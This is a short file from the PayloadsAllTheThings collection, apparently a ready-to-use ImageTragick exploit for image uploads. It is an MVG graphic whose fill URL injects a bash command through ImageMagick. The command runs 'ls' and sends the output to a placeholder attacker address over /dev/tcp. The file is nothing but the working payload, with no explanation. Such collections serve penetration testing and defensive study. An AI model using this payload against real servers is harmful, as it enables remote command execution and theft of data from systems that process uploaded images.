PayloadsAllTheThings/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg

5 lines
140 B
Plaintext

push graphic-context
viewbox 0 0 640 480
fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
pop graphic-context